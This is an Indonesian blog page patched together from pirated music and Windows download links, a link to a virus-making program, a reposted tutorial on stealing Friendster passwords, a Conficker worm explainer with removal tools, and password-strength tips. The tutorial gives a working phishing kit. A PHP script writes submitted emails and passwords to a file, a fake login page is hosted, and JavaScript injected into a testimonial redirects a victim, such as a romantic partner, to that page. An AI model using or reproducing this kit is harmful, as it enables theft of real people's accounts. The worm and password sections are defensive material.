1. Avenged Sevenfold - Diamonds In The Rough(2008) Click Here To Download
2. Avenged Sevenfold - Avenged Sevenfold(2007) Click Here To Download
3. Avenged Sevenfold - City Of evil pt.1(2005) Click Here To Download
4. Avenged Sevenfold - City Of evil pt.2(2005) Click Here To Download
5. Avenged Sevenfold - Waking The Fallen(2003) Click Here To Download
6. Avenged Sevenfold - Sounding The Seventh Trumpet(2001) Click Here To Download

Hola,,,

Setelah mencari ide apa yang artikel apa yang harus dimasukan kedalam blog saya. akhirnya saya memutuskan untuk mencari artikel tentang cara menghacking password Friendster karena banyak teman – teman saya yang menyarankan untuk memasukan artikel tersebut agar mereka mudah untuk membacanya tanpa perlu memakai search engine segala. dan setelah goggling sejenak akhirnya saya dapat juga di jasakom.com. nah ini dia selamat membaca. GBU

Penerapan Social Engineering untuk mendapatkan password di Friendster

Date: Wednesday, February 14, 2007 Hits: 14195 By: numpang_lewat

Artikel ini ditujukan bahwa ” Hacking tidak selamanya menggunakan TOOLS “. So bagi para 3133t sebaiknya tidak membaca ARTIKEL ini jika anda tidak ingin mual, perut kembung, bibir pecah2, kepala senut2.. dll. Artikel ini diperuntunkan bagi anda tertarik, cinta, haus ilmu dari Social Engineering…. Sekali lagi Artikel ini hanya ditujukan bagi temen2 yg belum mengetahui teknik ini. Jika temen2(terutama for 3133t) Sudah tahu teknik ini SAYA MOHON STOP!! STOP!! STOP!! STOP!! STOP!! STOP!! tetapi bila anda tetap sja Ngotot ingin meneruskan saya tidak bisa memaksa anda… Lanjutt …. Akhir-akhir ini banyak yg membicarakannya, bahkan sedang menjadi berita hangat. Mngkin para 3133t sudah menemukannya hampir 2 tahun yg lalu. Sebagaimna telah dijelaskan pada artikel sebelumnya (WuPz, jagonya dll). Testimonial Redirect bisa jadi berabe bgt kalo disalah gunakan. Artinya?? cara tersebut bisa digunain buat ngedapetin password, cookies, or perhatian lebih dari doi ama kita ) n laen-laen .. . So langsung saja kita menuju acara puncak … Pertama-tama yg mesti kita siapin : 1. Teh manis penghangat malam. 2. Jangan Lupa cemilan yg bikin Kriuk .. kriuk … 3. Web Hosting yg support PHP. Cari di paman Google banyak.. 4. Upload file index.htm (ada di source). 5. Sertakan code php dan JavaScript di bawah ini dan ” SAVE As ” sesuai dg nama link yg dituju pada Form Login. $email = $_POST[email]; $password = $_POST[password]; $fl = fopen(’password.txt’, ‘a’); fwrite($fl, “$email . $password \n\n”); fclose($fl); ?> Dan upload file diatas ke www.webyangsupportphp.com 6. Buat file Text kosong dengan nama Sesuai perintah Open pada php code di atas. Jangan lupa CHMOD diganti sesuai dg kebutuhan kamu!!. 7. kirim testi dg : hai syang .. gimna kabarna, kagen nie .. nah .. Setelah sang pacar penerima testi membuka “New Testimonials”, maka sesuai dg perintah yang berada di JavaScript => window.location <= yg disisipkan maka link akan menuju ke http://webyangsupportphp.com/index.htm . setelah terbuka, secara tanpa sadar sang pacar mengira halaman yg terbuka adalah sungguhan. Ya !!!! tanpa disuruh, dibelai-belai, n tanpa rayuan maut pun sang pacar akan dg rela hati mengisi Form login tipuan. Akhirnya dg pura-pura tidak tahu, muka bego, sedikit bodoh. Si pengirim testi menawarkan jasanya untuk sang pacar tercinta… =] ) Selain itu teknik diatas akan terlihat seperti aslinya jika menggunakan ” OVERLAY GENERATOR ” pada profil fs pada saat pengiriman testimonial yg berisi html code ( index.htm). Dg mengganti link Relatif menjadi absolut(baca S.I.H lebih lanjut) pada form login di index.htm maka pada saat pengiriman data akan menuju ke http://webyangsupportphp.com/login.php Kesimpulan : # Hacking tidak selamanya menggunakan ” TOOLS “ # Kelemahan XSS merupakan bahaya besar # Teknik ini semata-mata hanya untuk pengetahuan. Resiko ditanggung anda sendiri !!!!

Program Instan Membuat Virus Komputer dengan VB+ViMeker32

FVB_ViMaker32_RC_03

Program bikin Windows Asli
Win Org

Windows Vista XP Ultimate SP3 2007

LinkWindows Vista XP Ultimate SP3 2007

Anti Virus

Kaspersky

Sebenarnya sejak beberapa hari ini sempat membaca/mendapat informasi mengenai worm Downadup di beberapa blog tentang security/virus/antivirus, tetapi saya biarkan saja karena dikira hanya berita worm biasa. Tetapi ternyata banyaknya yang memberitakan tentang worm ini karena memang worm ini cukup “dahsyat” dan canggih.

Berdasarkan perkiraan dari F-Secure, salah satu variant baru worm ini sudah menginfeksi hampir 9 juta komputer hanya dalam waktu 4 hari. Jumlah yang tidak sedikit untuk worm yang belum lama muncul.

Nama asli Worm ini adalah Worm:W32/Downadup.gen dan mempunyai berbagai nama alias seperti : W32/Conficker.worm.gen (Symantec), Mal/Conficker (Sophos) , Worm: Win32/Conficker (Microsoft). Selain itu juga dikenal dengan nama Conflicker dan Kido (contoh nama : Worm: W32/Downadup.gen!A, Net-Worm.Win32.Kido.ih ). Worm ini termasuk kategori Malware yang berjalan di windows 32 -bit, makanya disebut W32.

Penyebaran worm

Penyebaran worm ini melalui berbagai cara, seperti Network/jaringan yang di share atau password yang lemah, juga bisa menyebar dengan membuat file pemicu autorun.inf yang di copykan ke USB Flashdisk (drive) atau media removable lainnya. Maka sebaiknya fitur autorun windows ini dimatikan selain untuk mencegah penularan berbagai virus lainnya.

Worm ini memanfaatkan celah keamanan Windows untuk menginfeksi korbannya, seperti artikel sebelumnya Ada apa dengan Security Update Windows MS08-067. Worm akan membuat folder dengan nama acak di dalam directory RECYCLER ( yang digunakan Recycle Bin untuk menyimpan file yang telah dihapus ) juga menduplikasi diri di berbagai tempat lainnya.

Efek Worm Downadup

Dan ini mungkin yang membuat saya menulis artikel ini, beberapa pengunjung ebsoft menuliskan komentar bahwa mereka tidak bisa membuka situs-situs antivirus, dan bisa jadi penyebabnya adalah worm ini.

Worm ini mampu mengubah/menambah fungsi internal windows (TCP) untuk memblok akses situs-situs keamanan (security/antivirus), dengan memfilter alamat yang mempunyai karakter/text tertentu. Dan untuk menghilangkan efek tersebut tidak mudah, karena boleh dibilang sudah tingkat low level programming.

Worm ini didesign untuk melindungi diri dari deteksi antivirus dengan menggunakan teknik tertentu yang jarang digunakan, melindungi diri dari upaya untuk di hapus, mematikan windows update, restore point sebelum infeksi, mematikan trafik jaringan tertentu, mengoptimalkan fitur windows Vista untuk memudahkan penyebaran, mampu menginjeksi explorer.exe, svchost.exe dan services.exe dan lainnya.

Situs-situs yang di blok cukup banyak, meliputi web yang menggunakan text seperti berikut ( bisa di blok atau selalu memunculkan pesan Time Out ketika membuka situsnya) :

• virus
• spyware
• malware
• rootkit
• defender
• microsoft
• symantec
• norton
• mcafee
• trendmicro
• sophos
• panda
• etrust
• f-secure
• kaspersky
• f-prot
• nod32
• eset
• grisoft
• avast
• avira
• comodo
• clamav
• norman
• pctools
• rising
• sunbelt
• threatexpert
• wilderssecurity
• windowsupdate
• avp
• avg

Selain itu juga situs-situs security lainnya.

Bagi yang belum terkena, maka untuk menghindari bisa download update Untuk Windows XP Microsoft Security Update MS08-067 (Patch for fixing the security hole). Sedangkan jika komputer sudah terinfeksi, maka bisa download remover tool, baik dari F-Secure atau Bitdefender dibawah ini.

Download Downadup Removal Tools

• http://www.bitdefender.com/site/Downloads/downloadFile/1584/FreeRemovalTool
• ftp://ftp.f-secure.com/anti-virus/tools/beta/f-downadup.zip
• Versi terbaru dari f-secure di ftp://ftp.f-secure.com/anti-virus/tools/beta/
• Removal Tools dari Microsoft, Malicious Software Removal Tool

Referensi lebih lanjut

• http://www.f-secure.com/v-descs/worm_w32_downadup_gen.shtml
• http://www.f-secure.com/v-descs/worm_w32_downadup_al.shtml
• http://www.megaleecher.net/Fix_Worm_W32.Downadup_Win32.Conficker
  http://news.bitdefender.com/NW923-en–BitDefender-Reports-Older-Known-Worm-Causing-New-Outbreaks.html
• http://www.bitdefender.com/VIRUS-1000462-en–Win32.Worm.Downadup.Gen.html

Saat ini dengan banyaknya account yang kita miliki, mulai dari email, website, login bank, dan login ke account penting di Internet lainnya, mengharuskan kita membuat password yang cukup kuat, agar keamanan lebih terjamin. Apalagi jika account tersebut menyangkut informasi yang sangat penting, maka harus lebih memperhatikan masalah password ini.

Ada berbagai tips untuk membuat password yang kuat termasuk software untuk membuatnya pun banyak bertebaran di internet. Tetapi jika dihasilkan dari software, maka biasanya akan ditampilkan secara acak. Jadi meskipun kuat, tetapi sulit diingat. Bagaimana tips membuat Strong Password?

Ada tiga komponen penting agar text password yang dibuat merupakan Strong Password, yaitu panjang, kombinasi huruf dan bukan merupakan kata-kata atau istilah umum.

Buat Password yang panjang. Setiap huruf yang ditambahkan ke password kita, maka akan menambah keamanan dan kekuatan password tersebut. Password yang disarankan minimal memiliki panjang 8 huruf (meskipun ada yang minimal 7 huruf), dan idealnya 14 huruf atau lebih. Sebagai contoh password dengan panjang 15 huruf abjad acak saja bisa lebih kuat 33.000 kali dibanding password dengan panjang 8 huruf acak dari huruf di keyboard.

Kombinasikan Huruf abjad, angka dan simbol. Semakin besar kombinasi ketika komponen ini, maka kekuatan password akan semakin bertambah. Jika tidak bisa menggunakan simbol, maka alternatifnya dengan menambah panjang password tersebut. Meskipun Idealnya password yang kuat merupakan kombinasi ketiga komponen diatas.

Huruf abjad (letters) adalah karakter a,b,c… z dan A,B,C…Z, angka merupakan bilangan 0,1,2,3..9 dan simbol adalah huruf selain abjad dan bilangan, seperti #$%^&*(&:”./{}.

Hindari password yang merupakan kata/istilah umum. Seperti misalnya tanggal lahir kita, nama kita, tahun kelahiran dan sebagainya. Karena biasanya password tersebut akan mudah diketahui orang lain. Termasuk juga kata-kata yang sering diucapkan, kata-kata populer dan sejenisnya. Biasanya program password cracker sudah mempunyai atau menyiapkan database kata-kata tersebut.

Tetapi selain ketiga komponen diatas, ada satu lagi yang juga penting untuk diperhatikan, yaitu password tersebut mudah kita ingat, karena meskipun kuat, tetapi susah diingat akan sama saja, kadang malah merepotkan dan memusingkan.

Beberapa tips lain yang perlu diperhatikan ketika membuat password

• Hindari membuat password dengan huruf-huruf yang urut, misalnya “123456789″, “33333″ atau “abcdef” dan sebagainya
• Hindari password yang hanya mengubah huruf yang mirip angka saja. Misalnya mempunyai nama agus, dan membuat pasword “46u5″ maka ini akan lebih mudah ditebak. “Password” diubah menjadi “P4ssw0rd”. Sebaiknya digunakan kombinasi panjang dan tambahan komponen lainnya
• Hindari kata-kata yang udah umum, seperti nama, tempat lahir, tanggal lahir, sekolah, kuliah dan sebagainya
• Buat password yang berbeda untuk beberapa account penting

Bagaimana untuk mengecek apakah password kita lemah, sedang atau kuat ?

Saat ini ketika kita membuat account, maka biasanya sudah disediakan informasi kekuatan password kita, misalnya di yahoo, google, wordpress dan lainnya. Alternatif lainnya bisa menggunakan fasilitas Password Checker, yang merupakan fasilitas untuk mengetahui seberapa kuat password yang dituliskan. Fasilitas ini tidak akan merekam apa yang diketikkan